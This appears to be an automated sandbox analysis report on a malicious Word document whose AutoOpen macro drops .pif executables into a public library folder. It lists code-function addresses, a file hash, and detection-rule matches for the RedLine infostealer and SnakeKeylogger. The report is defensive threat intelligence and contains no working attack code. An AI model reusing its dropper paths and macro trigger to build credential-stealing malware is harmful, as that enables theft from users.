Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25D0C0	12_2_2A25D0C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A258DC0	12_2_2A258DC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25E3CF	12_2_2A25E3CF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2536C8	12_2_2A2536C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2562C8	12_2_2A2562C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25FBC8	12_2_2A25FBC8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2516C8	12_2_2A2516C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25B8C8	12_2_2A25B8C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2504D0	12_2_2A2504D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A258DD0	12_2_2A258DD0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2516D8	12_2_2A2516D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25B8D8	12_2_2A25B8D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A253FD8	12_2_2A253FD8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2575D8	12_2_2A2575D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28E810	12_2_2A28E810
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28EB30	12_2_2A28EB30
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A287150	12_2_2A287150
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2809D0	12_2_2A2809D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A288A3F	12_2_2A288A3F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28D230	12_2_2A28D230
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28A030	12_2_2A28A030
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A288410	12_2_2A288410
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28B610	12_2_2A28B610
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A287460	12_2_2A287460
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28D870	12_2_2A28D870
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A287470	12_2_2A287470
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28A670	12_2_2A28A670
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A280040	12_2_2A280040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28BC40	12_2_2A28BC40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28EE50	12_2_2A28EE50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28BC50	12_2_2A28BC50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A288A50	12_2_2A288A50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28DEB0	12_2_2A28DEB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A287AB0	12_2_2A287AB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28ACB0	12_2_2A28ACB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28AC9F	12_2_2A28AC9F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28F490	12_2_2A28F490
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A289090	12_2_2A289090
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28C290	12_2_2A28C290
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2804FA	12_2_2A2804FA
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28E4F0	12_2_2A28E4F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2880F0	12_2_2A2880F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28B2F0	12_2_2A28B2F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28FAC1	12_2_2A28FAC1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2880DF	12_2_2A2880DF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28FAD0	12_2_2A28FAD0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28C8D0	12_2_2A28C8D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2896D0	12_2_2A2896D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28A33F	12_2_2A28A33F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A288730	12_2_2A288730
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28B930	12_2_2A28B930
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A280508	12_2_2A280508
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A289D10	12_2_2A289D10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28CF10	12_2_2A28CF10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28A97F	12_2_2A28A97F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28F170	12_2_2A28F170
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A288D70	12_2_2A288D70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28BF70	12_2_2A28BF70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A287140	12_2_2A287140
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28D550	12_2_2A28D550
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28A350	12_2_2A28A350
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28F7A0	12_2_2A28F7A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2809BF	12_2_2A2809BF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28F7B0	12_2_2A28F7B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28C5B0	12_2_2A28C5B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2893B0	12_2_2A2893B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28DB90	12_2_2A28DB90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A287790	12_2_2A287790
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28A990	12_2_2A28A990
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28CBF0	12_2_2A28CBF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2899F0	12_2_2A2899F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28AFC0	12_2_2A28AFC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28E1D0	12_2_2A28E1D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A287DD0	12_2_2A287DD0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A28AFD0	12_2_2A28AFD0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A296120	12_2_2A296120
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A29C770	12_2_2A29C770
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A294820	12_2_2A294820
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A291620	12_2_2A291620
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A295E00	12_2_2A295E00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A292C00	12_2_2A292C00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A290007	12_2_2A290007
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A294E60	12_2_2A294E60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A291C60	12_2_2A291C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A293240	12_2_2A293240
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A290040	12_2_2A290040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A29DEA8	12_2_2A29DEA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2954A0	12_2_2A2954A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2922A0	12_2_2A2922A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A293880	12_2_2A293880
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A290680	12_2_2A290680
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2928E0	12_2_2A2928E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A295AE0	12_2_2A295AE0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A29F0F8	12_2_2A29F0F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A29FAC9	12_2_2A29FAC9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A293EC0	12_2_2A293EC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A290CC0	12_2_2A290CC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A29FAD8	12_2_2A29FAD8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A292F20	12_2_2A292F20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A29F108	12_2_2A29F108
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A294500	12_2_2A294500
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A291300	12_2_2A291300
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A293560	12_2_2A293560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A290360	12_2_2A290360
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A294B40	12_2_2A294B40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A291940	12_2_2A291940
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A293BA0	12_2_2A293BA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2909A0	12_2_2A2909A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A295180	12_2_2A295180
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A291F80	12_2_2A291F80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2941E0	12_2_2A2941E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A290FE0	12_2_2A290FE0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2957C0	12_2_2A2957C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2925C0	12_2_2A2925C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F2A38	12_2_2A3F2A38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F0E38	12_2_2A3F0E38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3FAE34	12_2_2A3FAE34
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3FA2B0	12_2_2A3FA2B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F2338	12_2_2A3F2338
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F0040	12_2_2A3F0040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F0740	12_2_2A3F0740
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F3F20	12_2_2A3F3F20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F1C38	12_2_2A3F1C38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F1538	12_2_2A3F1538
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F2A29	12_2_2A3F2A29
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F0E28	12_2_2A3F0E28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F232A	12_2_2A3F232A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F0006	12_2_2A3F0006
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F0730	12_2_2A3F0730
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F1C29	12_2_2A3F1C29
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F91E0	12_2_2A3F91E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F91D0	12_2_2A3F91D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3FB658	12_2_2A3FB658
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A3F152A	12_2_2A3F152A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2AD3BDC8	12_2_2AD3BDC8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2AD3D138	12_2_2AD3D138
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2AD36708	12_2_2AD36708
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029920C4	13_2_029920C4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00408C60	16_2_00408C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_0040DC11	16_2_0040DC11
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00407C3F	16_2_00407C3F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00418CCC	16_2_00418CCC
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00406CA0	16_2_00406CA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_004028B0	16_2_004028B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_0041A4BE	16_2_0041A4BE
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00418244	16_2_00418244
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00401650	16_2_00401650
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00402F20	16_2_00402F20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_004193C4	16_2_004193C4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00418788	16_2_00418788
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00402F89	16_2_00402F89
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00402B90	16_2_00402B90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_004073A0	16_2_004073A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1A2E125D	16_2_1A2E125D
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1A2E12B0	16_2_1A2E12B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1A2E12C0	16_2_1A2E12C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1A2E1560	16_2_1A2E1560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1A2E1551	16_2_1A2E1551
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29BD60	16_2_1D29BD60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29AF00	16_2_1D29AF00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D298F18	16_2_1D298F18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D295E58	16_2_1D295E58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D295822	16_2_1D295822
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29BA7F	16_2_1D29BA7F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29AA58	16_2_1D29AA58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29D490	16_2_1D29D490
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29B4C0	16_2_1D29B4C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29B7A0	16_2_1D29B7A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D2941E7	16_2_1D2941E7
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29B1DF	16_2_1D29B1DF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29F0C8	16_2_1D29F0C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29AC20	16_2_1D29AC20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29E5E8	16_2_1D29E5E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29E5D9	16_2_1D29E5D9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D29D480	16_2_1D29D480
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1D293068	16_2_1D293068
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E450E38	16_2_1E450E38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45C6E0	16_2_1E45C6E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E450738	16_2_1E450738
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45CF90	16_2_1E45CF90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E450040	16_2_1E450040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E457808	16_2_1E457808
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E458550	16_2_1E458550
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E453508	16_2_1E453508
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45F242	16_2_1E45F242
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45F250	16_2_1E45F250
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45C27A	16_2_1E45C27A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45BE20	16_2_1E45BE20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E450E29	16_2_1E450E29
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E457A28	16_2_1E457A28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45BE30	16_2_1E45BE30
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45C6D0	16_2_1E45C6D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45FAF1	16_2_1E45FAF1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45C288	16_2_1E45C288
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45F69A	16_2_1E45F69A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45F6A8	16_2_1E45F6A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45FB00	16_2_1E45FB00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45CB28	16_2_1E45CB28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45072A	16_2_1E45072A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45CB38	16_2_1E45CB38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45D3D8	16_2_1E45D3D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45D3E8	16_2_1E45D3E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45CF82	16_2_1E45CF82
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45D840	16_2_1E45D840
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E457070	16_2_1E457070
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E450006	16_2_1E450006
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45D832	16_2_1E45D832
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45E0E0	16_2_1E45E0E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45E0F0	16_2_1E45E0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E4534F8	16_2_1E4534F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E457080	16_2_1E457080
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45DC88	16_2_1E45DC88
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45DC98	16_2_1E45DC98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E458540	16_2_1E458540
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45E548	16_2_1E45E548
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45B56F	16_2_1E45B56F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45E538	16_2_1E45E538
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45B9C8	16_2_1E45B9C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45B9D8	16_2_1E45B9D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45EDE9	16_2_1E45EDE9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45EDF8	16_2_1E45EDF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45B580	16_2_1E45B580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45E990	16_2_1E45E990
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E45E9A0	16_2_1E45E9A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E466C18	16_2_1E466C18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E467AF0	16_2_1E467AF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E46BEA0	16_2_1E46BEA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E4665C0	16_2_1E4665C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E461A40	16_2_1E461A40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E46EC40	16_2_1E46EC40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_1E460040	16_2_1E460040

Source: ENQ-0092025.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen			Name: AutoOpen

Source: ENQ-0092025.doc

OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\jphwmyiA.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: String function: 0040E1D8 appears 132 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 0284881C appears 45 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 0283480C appears 931 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028344AC appears 74 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028344D0 appears 33 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 02848798 appears 54 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028346A4 appears 244 times
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: String function: 029946A4 appears 154 times
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: String function: 029A8798 appears 48 times
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: String function: 0299480C appears 619 times

Source: 20.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.Aiymwhpj.PIF.211f67a8.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
